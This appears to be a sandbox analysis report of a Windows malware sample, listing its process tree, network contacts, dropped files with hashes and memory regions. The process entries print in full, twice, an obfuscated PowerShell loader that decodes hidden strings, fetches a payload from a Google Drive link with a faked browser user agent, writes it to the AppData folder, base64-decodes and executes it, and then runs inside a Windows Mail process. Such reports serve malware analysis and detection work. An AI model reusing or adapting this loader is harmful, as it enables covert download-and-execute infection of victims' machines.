"C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Undeductible Erklrende Scrutinising #>;$Unidigitate='Paggle';<#Gennemsnitslager Blegeste parasolette Bankrolling Pullman #>;$Lyophile=$host.PrivateData;If ($Lyophile) {$Fichuet++;}function Bevandret($Chay){$Akkordeoner10=$Chay.Length-$Fichuet;for( $Catering=5;$Catering -lt $Akkordeoner10;$Catering+=6){$Sortbrshandel228+=$Chay[$Catering];}$Sortbrshandel228;}function Levir($Circumtonsillar){ & ($Locusting144) ($Circumtonsillar);}$Mats=Bevandret 'PressMGaussoSvajrzIstaniSpra,lFlenslBenziaDokt /Ar.he5Sub r. Zuri0Akk r .dgi(Expr Wg naaiAlsacnDecimdCatasoOctadw equis Trai SeedN TegnT inis Desti1 Comb0Epige.Model0 Flat;Cant exanW P epiaristnOv,rs6Gru,d4Porse;Sturt AfgifxTilt 6Cling4,isto;legis McginrAssigvVapor:Aldol1Frogl2Zardm1Doven.kae l0Dob e)Efter PolyGUnipeeCrowncBlis,kNapifoListe/ Half2 Sy e0Prepe1,pina0 riss0Amtsg1Ala k0Smelt1d.mme Beti,Fe anaiDob.erTilsieMontrfMultiolns.ix Poe./Hipp,1Tilba2 Bele1 Reco.Unnom0Forte ';$Cateringlario=Bevandret 'K.svauo.erasPalpeEVess.RAbort-FrdigAbagsigTmmereAlminn Pa tterhve ';$Kropssprog=Bevandret 'Frimrh,lokkt odeltEmulspAc,uis inde: Ska./Stigr/HereddImarer Re uiTuffev odbe Bind.tovnigGuateoU faroParkegInterlbund eStege.SystucOversoP,rmemSvuls/ BloduApparcLin e?A opeeSchtixOr,efpInstro U flr B,ldtMogot= GrundPlastono.fow da anA.thrlTiljuoS.mora .enndUpflu&Pomo i Tem.dUnm v=Insid1 ntelASvajeRPre oF P stM WhitqRurergT.lriQHo ca9,roemHSmergy oghamChampLRi gepFolebwVrget2HolocXSemesoProjeiTriksFfriedgRhodag conc4Befol4ChronfDupliTTrkl,bS,lteWPrfa,Z Hovey Non NSqui,KRer gOUbeta ';$Nitrosite=Bevandret 'Besti>Su.er ';$Locusting144=Bevandret 'concriEnd ce C,keXGenkb ';$Abdicator='Suldans';$Dicatalectic = Bevandret 'TransePrdikc olamh lleoAbbey Refri%Beaveahaglbp,rayep Ringd algbaE foltDesina acht%Uns,m\Bev sNp rtmo,axonnAftrka RosepKv,lioD,spisMi jttImmunaMedlet Tridi .otlzCo iciFindynPengeg Tress Yabu.AbstrN muraosest,nSkr,e Unma&Glott&Rugni 
Reduce ominc reskh Resho Fy r Ki kutUlpmi ';Levir (Bevandret 'Palat$RichegGidsel rffeoMinerb ,evoaAstralampel:AntisEA.hopn F.nej O deeUdvidtMoti,=Stili(B rikcBrasem PremdVerni Skbn./ ThebcEvang Agram$DowdiDPrepri rbejcK,leraGrovdtAnsttaEk.emlBir heAttlecHusmnt Tyr iInvescUn og) Ungk ');Levir (Bevandret ' Spu $Ild bgPitomlBefrioE ersbKlim,aM jeml Maal:Do keW Supre AutoeGa sskTiltae .aanndaugad magfGreylr rkrei P ectpervi=Forrd$t murKUo.fir mangoSuf.opAltersOpsnasIn,erpattr rnondeoUdeergEnmes.pr grs FastpLufttlPern iBuf etA.tma( kole$ChimnNHovedi GenetAutomr BrunoSteddsInfigiTanket Ca.aeCache)Unhou ');Levir (Bevandret 'Res r[Bi elNA dele HjertBalli.Kol,kSVa uuecammerKnavevSp oni Stalct ange JamaP St xoEnfeti JernnInkakt DramMHvil.a milin orsyaUnderg MinieTegnerStrit] Stro:Barre:IntenSkapnieSprric aturuF rber Ski,iOverctLeucoyDamn PEksperNitroo SysttKedeloFeriecAutokoKoksel unk Juri =.heat Eriks[ Slv.NCentreAnmastDem r. ReinS DroseOmkrscHologuFlipdrElmaaiLimnotB achyNevscPopsenrDaakao echyt F.broTeroscBoligoCau.alPo luTIndbyy Non pAmoebeKlie ]Fi it:Inval: tatuTParahlTriumsForbe1Perit2Makro ');$Kropssprog=$Weekendfrit[0];$undrunken= (Bevandret 'Unwat$tamp gTe.delTutteOYoungBkogepavok.elEa th:Raakah oldsA BagdV SpalB Ril iT sseODistol KamcoUndvigConstIFo,ktS,eassK M ds=Ap ean jeneE NutswS.ole-FraskoMicroBYrk rJShamoEDek pcFjodoTSuper ZippSJok sYKos.esRev et AbioERastpmMass . 
Retrn L ukEBedewt Trau.CrucewFodnoECongobSabziCtilkaL LectiT dimEtertuNTermot');$undrunken+=$Enjet[1];Levir ($undrunken);Levir (Bevandret 'Stern$Jarl h AnegaKvartvDicerbSolceiCi,cuoBegunl lhexoBoratgImmigiSalifsOu pekPukke.Amal H TeeteChitta KlosdUnwateDragsropl tsFo sk[Const$ForbrCBindia inintLseneePicayrSour iLi nin .otag nitlSandca ensrRedemiRomeroKruge]Toler= ravi$De,tiM RdstaOve et ChlosSa.me ');$Evese=Bevandret 'Lice $Langehbaan a BearvFag obNephriReconoMatril Proco Re ngLifeliSkihesTryghkIndep.InterDChelooUlejlw B.rnn BelalCapsuosold aGuttid Uni FFiguri Gi.pl PrteeAnfly(E,ten$AcadeKCompur alpeoDend.punfrusIndspsPresip evor AntnoTran g Svan,Sreje$ pulsMTungsu Kludl rkaitC,poniAto adAf,tie,xidanForlyosulphmC,anciNodu,nPhiloast,tutElysiiSmothoPsit n Turia ylonlDetin)Solmi ';$Multidenominational=$Enjet[0];Levir (Bevandret 'Forre$ PartgKatatlU.whiOEpitoBPokeraPayabLC pta:Anta DGrumsaAsla RAcmatTSgneda verhg vedN as,rAParlanAuton= Py.i(Gr.viTSigbeEPetrosCortitBortk-Arbejpfis eA ijuTLdaasHSy os Disce$K.nvoMSysilUMyxopLm.terthead IsockmDKakotERin nNGrafiO virkmSixtyI Amb nfremkaIdriftKostpiDestaOHose nNymphaAnhngLFlipp)De kl ');while (!$Dartagnan) {Levir (Bevandret 'Annui$Ting,gUnfrul Dul o KludbMlle a Fejll ch m:pr.toSOpfathTus haI.dusbSubmoaBiggesFabulhNnsom=Malor$B efotExilirPs uduS aireIse k ') ;Levir $Evese;Levir (Bevandret 'FljetSDgnratScollaC arkr tifttPa,ag-RaglaSToccal RkeneBandledosimp ini gow s4Skyde ');Levir (Bevandret 'Brisk$ Progg partlBilleoVikinbSkakta ThrulSnnek:NaragD Smrsa CoedrN,ncotS tsfadiffugAc.din ChetaAratinSoffi=Tab n( StriTFrstee atsusVidertEkspo-Fori PRepreaBver.tGloheh O.di Askeb$ SkjoMS,akkuAnklalVanditslimiiDentidGa.rne IntenNegleo raemDealliOve rnPseudaSagsbt ensliAncisoMinkinAfln aUnedgl redi)Wh op ') ;Levir (Bevandret 'Net.p$ RivugF brilPostuo Fregbls.laaLivs,l Inde:Hy erDInduseColornln,ero IsoltK rkea OvertPapi u HolimS pho= Unde$PopligBags lresero nticbOlde aGrundlDad i: ClapOGandhpJ,lpapSkriviDr abdMateraTusinnTumpfs 
Swim+Overh+fodbo%Urteg$TrompWFibrie melleFigurkfoxlieUndernTumtudTinpefSuperrSwankiTiddytVenli.A,klac xpanoCes ku ItainSmrebtInco. ') ;$Kropssprog=$Weekendfrit[$Denotatum];}$Antisiphon47=335402;$filnumre=29061;Levir (Bevandret 'Slutn$Telefg RaadlStenkoSeignb PostaPosnilSpred: enelOSkraavUneneeElevrrForsnmUdle,iLinielNonchiDiagntJu,ioaAweatrDisiliV rucs welltE,ageiPrdikcUnrec ,ucc= Betj MasocGPreboeBevrttTangn-hetaeCCarsmoEpiton ,ncotHypereForton U detLderr Papel$HulkiMCanosuhaandlKissmtMezzoiDollmdPhonae allunRefo o A chmFriv i ubcanSubspaFle btfaksiiSmittoSightnE genaCommel ilte ');Levir (Bevandret 'Cuboi$Em.owgInadhl SulfoPrimrb Han aCog,ol Loft:PumpeSArbejpTr ruoPacetrHieraiinvolnGradag nbros,kibssProprt HurwaAnnult Co tiBes,ooInfilnUns,neMotorrslang C,rtw=,ntra Hyper[Blu.bSDiscryCatvusHobhotLuxu,eTilr m For .OstecCLinieoudspenvolosvLid,aeProlirUdvirtSkopu]Statu:aarti: KronFWernar Dento Co am JustB ChecaMeje,sggeble Fung6Eolop4ant cSsporvtGeleer.emini Un dnAvertg Cita( rick$EternONdkskvdisc e BombrHuggem Bin,iHors lPerfeiOplystGalataContrr OrlaiN,npasOver tHebdoiUndescRepro) ouce ');Levir (Bevandret 'budd $TappegJ ddyl SecuoForsgb T blaNrofflFract: toppOHushouTetantRegnesPatrutOverhiSl,ernFummmgDe.ar H.rod=Iron, Bakk[ bro.S MarcyPerpesSwirrtPanameSpatim Regn.T,adeT ArbeePins xFlagstInter.HypsiE SjllnAgen.c SkrvocarvodJe.emiFranknUnsa gDatao]Advar:Rifle:Des gAPolysSH emsCKiltiI ydskIHalvr.RasteGFngseePe titAnimiS Plait pildrS ormiReimanEfte gKonc.(Wh el$Anti,SCoho,pPropro TonirAut riCoynunFrilagMindls.ullas DeprtGut ia C stt UdmniAn.eloSlappnperfeeTicktrStats) lvsm ');Levir (Bevandret ' Fler$Unbrugfl,xilOutgroFla sb,arbeaUnl,nlFlus :PleocHDestieInde rNeutraAndelu aselsO,erm= Ov.r$CisteONyerhu Warft asersUna,ftScarciF tidn janigRyge .Kiti scoop.uTrkerb uarsPo,tct nmagr,artii Nonsn ShahgSkval( K va$,erisA IngunStenotGudmdisubtlsS mmeiAr,anpNedruhReageo ndernthyr.4 lect7Uncov, Halv$HousefDer,ni annlAr,ognReassuAutormAntenr regneTarif)Ca ak ');Levir $Heraus;"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Undeductible Erklrende Scrutinising #>;$Unidigitate='Paggle';<#Gennemsnitslager Blegeste parasolette Bankrolling Pullman #>;$Lyophile=$host.PrivateData;If ($Lyophile) {$Fichuet++;}function Bevandret($Chay){$Akkordeoner10=$Chay.Length-$Fichuet;for( $Catering=5;$Catering -lt $Akkordeoner10;$Catering+=6){$Sortbrshandel228+=$Chay[$Catering];}$Sortbrshandel228;}function Levir($Circumtonsillar){ & ($Locusting144) ($Circumtonsillar);}$Mats=Bevandret 'PressMGaussoSvajrzIstaniSpra,lFlenslBenziaDokt /Ar.he5Sub r. Zuri0Akk r .dgi(Expr Wg naaiAlsacnDecimdCatasoOctadw equis Trai SeedN TegnT inis Desti1 Comb0Epige.Model0 Flat;Cant exanW P epiaristnOv,rs6Gru,d4Porse;Sturt AfgifxTilt 6Cling4,isto;legis McginrAssigvVapor:Aldol1Frogl2Zardm1Doven.kae l0Dob e)Efter PolyGUnipeeCrowncBlis,kNapifoListe/ Half2 Sy e0Prepe1,pina0 riss0Amtsg1Ala k0Smelt1d.mme Beti,Fe anaiDob.erTilsieMontrfMultiolns.ix Poe./Hipp,1Tilba2 Bele1 Reco.Unnom0Forte ';$Cateringlario=Bevandret 'K.svauo.erasPalpeEVess.RAbort-FrdigAbagsigTmmereAlminn Pa tterhve ';$Kropssprog=Bevandret 'Frimrh,lokkt odeltEmulspAc,uis inde: Ska./Stigr/HereddImarer Re uiTuffev odbe Bind.tovnigGuateoU faroParkegInterlbund eStege.SystucOversoP,rmemSvuls/ BloduApparcLin e?A opeeSchtixOr,efpInstro U flr B,ldtMogot= GrundPlastono.fow da anA.thrlTiljuoS.mora .enndUpflu&Pomo i Tem.dUnm v=Insid1 ntelASvajeRPre oF P stM WhitqRurergT.lriQHo ca9,roemHSmergy oghamChampLRi gepFolebwVrget2HolocXSemesoProjeiTriksFfriedgRhodag conc4Befol4ChronfDupliTTrkl,bS,lteWPrfa,Z Hovey Non NSqui,KRer gOUbeta ';$Nitrosite=Bevandret 'Besti>Su.er ';$Locusting144=Bevandret 'concriEnd ce C,keXGenkb ';$Abdicator='Suldans';$Dicatalectic = Bevandret 'TransePrdikc olamh lleoAbbey Refri%Beaveahaglbp,rayep Ringd algbaE foltDesina acht%Uns,m\Bev sNp rtmo,axonnAftrka RosepKv,lioD,spisMi jttImmunaMedlet Tridi .otlzCo iciFindynPengeg Tress Yabu.AbstrN muraosest,nSkr,e Unma&Glott&Rugni Reduce ominc reskh Resho Fy r Ki 
kutUlpmi ';Levir (Bevandret 'Palat$RichegGidsel rffeoMinerb ,evoaAstralampel:AntisEA.hopn F.nej O deeUdvidtMoti,=Stili(B rikcBrasem PremdVerni Skbn./ ThebcEvang Agram$DowdiDPrepri rbejcK,leraGrovdtAnsttaEk.emlBir heAttlecHusmnt Tyr iInvescUn og) Ungk ');Levir (Bevandret ' Spu $Ild bgPitomlBefrioE ersbKlim,aM jeml Maal:Do keW Supre AutoeGa sskTiltae .aanndaugad magfGreylr rkrei P ectpervi=Forrd$t murKUo.fir mangoSuf.opAltersOpsnasIn,erpattr rnondeoUdeergEnmes.pr grs FastpLufttlPern iBuf etA.tma( kole$ChimnNHovedi GenetAutomr BrunoSteddsInfigiTanket Ca.aeCache)Unhou ');Levir (Bevandret 'Res r[Bi elNA dele HjertBalli.Kol,kSVa uuecammerKnavevSp oni Stalct ange JamaP St xoEnfeti JernnInkakt DramMHvil.a milin orsyaUnderg MinieTegnerStrit] Stro:Barre:IntenSkapnieSprric aturuF rber Ski,iOverctLeucoyDamn PEksperNitroo SysttKedeloFeriecAutokoKoksel unk Juri =.heat Eriks[ Slv.NCentreAnmastDem r. ReinS DroseOmkrscHologuFlipdrElmaaiLimnotB achyNevscPopsenrDaakao echyt F.broTeroscBoligoCau.alPo luTIndbyy Non pAmoebeKlie ]Fi it:Inval: tatuTParahlTriumsForbe1Perit2Makro ');$Kropssprog=$Weekendfrit[0];$undrunken= (Bevandret 'Unwat$tamp gTe.delTutteOYoungBkogepavok.elEa th:Raakah oldsA BagdV SpalB Ril iT sseODistol KamcoUndvigConstIFo,ktS,eassK M ds=Ap ean jeneE NutswS.ole-FraskoMicroBYrk rJShamoEDek pcFjodoTSuper ZippSJok sYKos.esRev et AbioERastpmMass . 
Retrn L ukEBedewt Trau.CrucewFodnoECongobSabziCtilkaL LectiT dimEtertuNTermot');$undrunken+=$Enjet[1];Levir ($undrunken);Levir (Bevandret 'Stern$Jarl h AnegaKvartvDicerbSolceiCi,cuoBegunl lhexoBoratgImmigiSalifsOu pekPukke.Amal H TeeteChitta KlosdUnwateDragsropl tsFo sk[Const$ForbrCBindia inintLseneePicayrSour iLi nin .otag nitlSandca ensrRedemiRomeroKruge]Toler= ravi$De,tiM RdstaOve et ChlosSa.me ');$Evese=Bevandret 'Lice $Langehbaan a BearvFag obNephriReconoMatril Proco Re ngLifeliSkihesTryghkIndep.InterDChelooUlejlw B.rnn BelalCapsuosold aGuttid Uni FFiguri Gi.pl PrteeAnfly(E,ten$AcadeKCompur alpeoDend.punfrusIndspsPresip evor AntnoTran g Svan,Sreje$ pulsMTungsu Kludl rkaitC,poniAto adAf,tie,xidanForlyosulphmC,anciNodu,nPhiloast,tutElysiiSmothoPsit n Turia ylonlDetin)Solmi ';$Multidenominational=$Enjet[0];Levir (Bevandret 'Forre$ PartgKatatlU.whiOEpitoBPokeraPayabLC pta:Anta DGrumsaAsla RAcmatTSgneda verhg vedN as,rAParlanAuton= Py.i(Gr.viTSigbeEPetrosCortitBortk-Arbejpfis eA ijuTLdaasHSy os Disce$K.nvoMSysilUMyxopLm.terthead IsockmDKakotERin nNGrafiO virkmSixtyI Amb nfremkaIdriftKostpiDestaOHose nNymphaAnhngLFlipp)De kl ');while (!$Dartagnan) {Levir (Bevandret 'Annui$Ting,gUnfrul Dul o KludbMlle a Fejll ch m:pr.toSOpfathTus haI.dusbSubmoaBiggesFabulhNnsom=Malor$B efotExilirPs uduS aireIse k ') ;Levir $Evese;Levir (Bevandret 'FljetSDgnratScollaC arkr tifttPa,ag-RaglaSToccal RkeneBandledosimp ini gow s4Skyde ');Levir (Bevandret 'Brisk$ Progg partlBilleoVikinbSkakta ThrulSnnek:NaragD Smrsa CoedrN,ncotS tsfadiffugAc.din ChetaAratinSoffi=Tab n( StriTFrstee atsusVidertEkspo-Fori PRepreaBver.tGloheh O.di Askeb$ SkjoMS,akkuAnklalVanditslimiiDentidGa.rne IntenNegleo raemDealliOve rnPseudaSagsbt ensliAncisoMinkinAfln aUnedgl redi)Wh op ') ;Levir (Bevandret 'Net.p$ RivugF brilPostuo Fregbls.laaLivs,l Inde:Hy erDInduseColornln,ero IsoltK rkea OvertPapi u HolimS pho= Unde$PopligBags lresero nticbOlde aGrundlDad i: ClapOGandhpJ,lpapSkriviDr abdMateraTusinnTumpfs 
Swim+Overh+fodbo%Urteg$TrompWFibrie melleFigurkfoxlieUndernTumtudTinpefSuperrSwankiTiddytVenli.A,klac xpanoCes ku ItainSmrebtInco. ') ;$Kropssprog=$Weekendfrit[$Denotatum];}$Antisiphon47=335402;$filnumre=29061;Levir (Bevandret 'Slutn$Telefg RaadlStenkoSeignb PostaPosnilSpred: enelOSkraavUneneeElevrrForsnmUdle,iLinielNonchiDiagntJu,ioaAweatrDisiliV rucs welltE,ageiPrdikcUnrec ,ucc= Betj MasocGPreboeBevrttTangn-hetaeCCarsmoEpiton ,ncotHypereForton U detLderr Papel$HulkiMCanosuhaandlKissmtMezzoiDollmdPhonae allunRefo o A chmFriv i ubcanSubspaFle btfaksiiSmittoSightnE genaCommel ilte ');Levir (Bevandret 'Cuboi$Em.owgInadhl SulfoPrimrb Han aCog,ol Loft:PumpeSArbejpTr ruoPacetrHieraiinvolnGradag nbros,kibssProprt HurwaAnnult Co tiBes,ooInfilnUns,neMotorrslang C,rtw=,ntra Hyper[Blu.bSDiscryCatvusHobhotLuxu,eTilr m For .OstecCLinieoudspenvolosvLid,aeProlirUdvirtSkopu]Statu:aarti: KronFWernar Dento Co am JustB ChecaMeje,sggeble Fung6Eolop4ant cSsporvtGeleer.emini Un dnAvertg Cita( rick$EternONdkskvdisc e BombrHuggem Bin,iHors lPerfeiOplystGalataContrr OrlaiN,npasOver tHebdoiUndescRepro) ouce ');Levir (Bevandret 'budd $TappegJ ddyl SecuoForsgb T blaNrofflFract: toppOHushouTetantRegnesPatrutOverhiSl,ernFummmgDe.ar H.rod=Iron, Bakk[ bro.S MarcyPerpesSwirrtPanameSpatim Regn.T,adeT ArbeePins xFlagstInter.HypsiE SjllnAgen.c SkrvocarvodJe.emiFranknUnsa gDatao]Advar:Rifle:Des gAPolysSH emsCKiltiI ydskIHalvr.RasteGFngseePe titAnimiS Plait pildrS ormiReimanEfte gKonc.(Wh el$Anti,SCoho,pPropro TonirAut riCoynunFrilagMindls.ullas DeprtGut ia C stt UdmniAn.eloSlappnperfeeTicktrStats) lvsm ');Levir (Bevandret ' Fler$Unbrugfl,xilOutgroFla sb,arbeaUnl,nlFlus :PleocHDestieInde rNeutraAndelu aselsO,erm= Ov.r$CisteONyerhu Warft asersUna,ftScarciF tidn janigRyge .Kiti scoop.uTrkerb uarsPo,tct nmagr,artii Nonsn ShahgSkval( K va$,erisA IngunStenotGudmdisubtlsS mmeiAr,anpNedruhReageo ndernthyr.4 lect7Uncov, Halv$HousefDer,ni annlAr,ognReassuAutormAntenr regneTarif)Ca ak ');Levir $Heraus;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nonapostatizings.Non && echo t"

C:\Program Files (x86)\windows mail\wabmig.exe

"C:\Program Files (x86)\windows mail\wabmig.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 216.58.201.110:443 drive.google.com tcp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.179.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 110.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 225.179.250.142.in-addr.arpa udp
GB 216.58.201.110:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.179.227:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.179.227:80 o.pki.goog tcp
US 8.8.8.8:53 227.179.250.142.in-addr.arpa udp
GB 142.250.179.225:443 drive.usercontent.google.com tcp
US 137.184.191.215:80 137.184.191.215 tcp
US 8.8.8.8:53 215.191.184.137.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 137.184.191.215:80 137.184.191.215 tcp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 137.184.191.215:80 137.184.191.215 tcp
US 8.8.8.8:53 25.140.123.92.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 137.184.191.215:80 137.184.191.215 tcp

Files

memory/5036-0-0x00007FF98BB53000-0x00007FF98BB55000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fgjsd4km.qt5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5036-10-0x00000199F23B0000-0x00000199F23D2000-memory.dmp

memory/5036-11-0x00007FF98BB50000-0x00007FF98C611000-memory.dmp

memory/5036-12-0x00007FF98BB50000-0x00007FF98C611000-memory.dmp

memory/5036-15-0x00007FF98BB53000-0x00007FF98BB55000-memory.dmp

memory/5036-16-0x00007FF98BB50000-0x00007FF98C611000-memory.dmp

memory/4332-17-0x00000000045C0000-0x00000000045F6000-memory.dmp

memory/4332-18-0x0000000004C30000-0x0000000005258000-memory.dmp

memory/4332-19-0x0000000004BA0000-0x0000000004BC2000-memory.dmp

memory/4332-20-0x00000000052D0000-0x0000000005336000-memory.dmp

memory/4332-21-0x0000000005340000-0x00000000053A6000-memory.dmp

memory/4332-31-0x0000000005470000-0x00000000057C4000-memory.dmp

memory/5036-32-0x00007FF98BB50000-0x00007FF98C611000-memory.dmp

memory/4332-33-0x0000000005A60000-0x0000000005A7E000-memory.dmp

memory/4332-34-0x0000000005AB0000-0x0000000005AFC000-memory.dmp

memory/5036-35-0x00007FF98BB50000-0x00007FF98C611000-memory.dmp

memory/4332-36-0x0000000007250000-0x00000000078CA000-memory.dmp

memory/4332-37-0x0000000006BD0000-0x0000000006BEA000-memory.dmp

memory/4332-38-0x0000000006D10000-0x0000000006DA6000-memory.dmp

memory/4332-39-0x0000000006CA0000-0x0000000006CC2000-memory.dmp

memory/4332-40-0x0000000007E80000-0x0000000008424000-memory.dmp

C:\Users\Admin\AppData\Roaming\Nonapostatizings.Non

MD5 762077e498d7a658ee381fcfaf25d060
SHA1 26410bd382fe84fedeec847889e22f4bb1964931
SHA256 7fa884749148a539e45b787679fe8524daf7f7d8c4c4db6207a60932ab7e7a79
SHA512 60aff6624dca974f03fb57b78408f2505fd2878cbaeaf9a05a434344984c7c373424e3bb30f90db7c800f56100b7bc3cb316b57d3128266accdfbb3a0a2a1c76

memory/4332-42-0x0000000008430000-0x000000000A9B3000-memory.dmp

memory/5036-43-0x00007FF98BB50000-0x00007FF98C611000-memory.dmp

memory/1676-44-0x0000000001080000-0x0000000003603000-memory.dmp

memory/1676-58-0x0000000001080000-0x0000000003603000-memory.dmp

memory/5036-61-0x00007FF98BB50000-0x00007FF98C611000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-786284298-625481688-3210388970-1000\0f5007522459c86e95ffcc62f32308f1_1b74ca46-c49b-4c52-a57d-8cd1ff70c625

MD5 d898504a722bff1524134c6ab6a5eaa5
SHA1 e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA512 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-786284298-625481688-3210388970-1000\0f5007522459c86e95ffcc62f32308f1_1b74ca46-c49b-4c52-a57d-8cd1ff70c625

MD5 c07225d4e7d01d31042965f048728a0a
SHA1 69d70b340fd9f44c89adb9a2278df84faa9906b7
SHA256 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA512 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b